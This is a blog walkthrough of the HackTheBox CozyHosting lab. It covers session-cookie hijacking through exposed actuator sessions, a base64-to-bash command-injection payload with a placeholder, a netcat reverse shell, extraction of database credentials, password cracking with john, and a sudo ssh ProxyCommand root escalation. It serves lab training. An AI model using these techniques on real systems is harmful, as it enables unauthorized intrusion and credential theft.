Skip to main content
HashnodeUntitled Publication

Command Palette

Search for a command to run...

CozyHosting | HTB Walkthrough

Published
2 min read
R
Rasmeet Singh

In this guide, we'll explore the process of tackling the CozyHosting Machine on HackTheBox.

Adding the Target

  1. Connect to Hack The Box using a VPN and make a note of the provided IP address.

  2. Log in to the root user on Kali Linux and include "cozyhosting.htb" in the /etc/hosts file.

Scanning

Begin by running a command to check the status of Ports and Services as the initial step.

sudo nmap -sC -sV -sS <ip address>

The scan reveals 2 open ports—22(ssh) & 80(http). When visiting the webpage, only a Login feature is available.

Enumeration

Utilize the 'dirsearch' tool to search for directories.

dirsearch -u http://cozyhosting.htb/

Gaining Admin Access to the Webpage

Investigate the suspicious directory, specifically /actuator/*. Enter the /actuator/sessions section to find Unauthorized sessions.

Manipulate the sessions via the login process using the browser's devtools, altering the cookie value to 'kanderson', granting access to the Admin web page.

Use Burpsuite to identify SSH configuration data and a potential Command Injection vulnerability in the 'Param Username' section.

;echo${IFS}”[ PAYLOAD ]”|base64${IFS}-d|bash;

Employ Netcat to regain shell access, discover a .jar file, download it, and extract Postgres Username and Password details.

Once the download is finished, extract the file, and you will find the Postgres Username and Password.

Stabilizing the Shell Connection

Ensure stability by importing the pty module and spawning a bash shell.

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Use the stty command to set terminal line settings and export TERM to xterm for a more compatible terminal emulator.

Once successfully connecting to Postgres, let’s explore the contents of the database to see what it holds for us.

Subsequently, we discover a username and password within the database and proceed to initiate the cracking process.

After successfully cracking the password, we can now attempt to establish an SSH connection.

john -w /usr/share/wordlists/rockyou.txt hash.txt

User flag has been obtained!

Privilege Escalation

Explore permissions using the sudo -l command, discovering SSH execution with root privileges.

Utilize the GTFO BIN payload to execute an SSH command, granting access to the root flag.

sudo ssh -o ProxyCommand=’;sh 0<&2 1>&2' x

Now, we can proceed to read the Root flag.

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

Untitled Publication

4 posts